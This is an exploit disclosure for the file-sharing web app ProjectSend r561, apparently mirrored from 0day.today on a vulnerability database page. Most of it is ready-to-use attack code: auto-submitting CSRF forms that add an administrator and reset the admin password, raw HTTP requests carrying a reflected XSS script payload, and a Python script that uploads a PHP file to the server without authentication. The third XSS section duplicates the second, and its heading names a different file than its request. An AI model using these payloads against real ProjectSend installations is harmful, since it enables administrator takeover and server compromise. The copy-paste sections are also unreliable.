Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ProjectSend r561 Multiple Vulnerabilities

🗓️ 28 Apr 2015 00:00:00Reported by TUNISIAN CYBERType 
zdt
 zdt🔗 0day.today👁 67 Views

ProjectSend r561 Multiple Vulnerabilities covered CSRF and XS

Code
#[+] Author: TUNISIAN CYBER
#[+] Title: ProjectSend r561 Multiple Vulnerabilities
#[+] Date: 25-04-2015
#[+] Vendor: http://www.projectsend.org/
#[+] Download:http://www.projectsend.org/download/67/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R

It's a long one so let's start...

I/ CSRF: Add Admin

<html>
<head>
<title>ProjectSend CSRF (Add User)</title>
</head>
<body>
    <form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="add_user_form_name" value="CSRF OPS" />
      <input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />
      <input type="hidden" name="add_user_form_pass" value="password" />
      <input type="hidden" name="add_user_form_email" value="[email protected]" />
      <input type="hidden" name="add_user_form_level" value="9" />
      <input type="hidden" name="add_user_form_active" checked="checked" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>

0x0Proof:
http://i.imgur.com/t77Plve.png

II/ CSRF: Change Admin Password:
<html>
<head>
<title>ProjectSend CSRF (Change Password)</title>
</head>
<body>
    <form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="add_user_form_name" value="User changed" />
      <input type="hidden" name="add_user_form_user" value="admin" />
      <input type="hidden" name="add_user_form_pass" value="password" />
      <input type="hidden" name="add_user_form_email" value="[email protected]" />
      <input type="hidden" name="add_user_form_level" value="9" />
      <input type="hidden" name="add_user_form_active" checked="checked" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>

III/ XSS_1 (index.php):
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

0x0Proof:
http://i.imgur.com/TDfFDU3.png

IV/ XSS_2 (clients.php):
http://192.168.186.129/ProjectSend-r561/clients.php

POST /ProjectSend-r561/clients.php HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 21:15:13 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2851
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

0x0Proof:
http://i.imgur.com/ywf8JdF.png

V/XSS_3 (actions-log.php)
http://192.168.186.129/ProjectSend-r561/clients.php

POST /ProjectSend-r561/clients.php HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E
HTTP/1.1 200 OK
Date: Sat, 25 Apr 2015 21:15:13 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2851
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

0x0Proof:
http://i.imgur.com/cVKIhj3.png

VI/ File Upload:
(Exploit oirignally found by Fady Mohamed Osman )

Rewrittend by TUNISIAN CYBER

#!/usr/bin/env python
import requests
print"+---------------------------------------+"
print"| ProjectSend File Upload Vulnerability |"
print"+---------------------------------------+"

vuln = raw_input('Vulnerable Site:')
fname = raw_input('EvilFile:')
with open(fname, 'w') as fout:
    fout.write("<?php phpinfo() ?>")
url = vuln +'/process-upload.php' +'?name=' + fname
files = {'file': open(fname, 'rb')}
result = requests.post(url, files=files)
print "===>" +vuln+"/upload/files/"+fname

#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Apr 2015 00:00Current
7.2High risk
Vulners AI Score7.2
projectsendr561multiplevulnerabilitiescsrfchangeadminpasswordadduserxss_1index.phpclient
67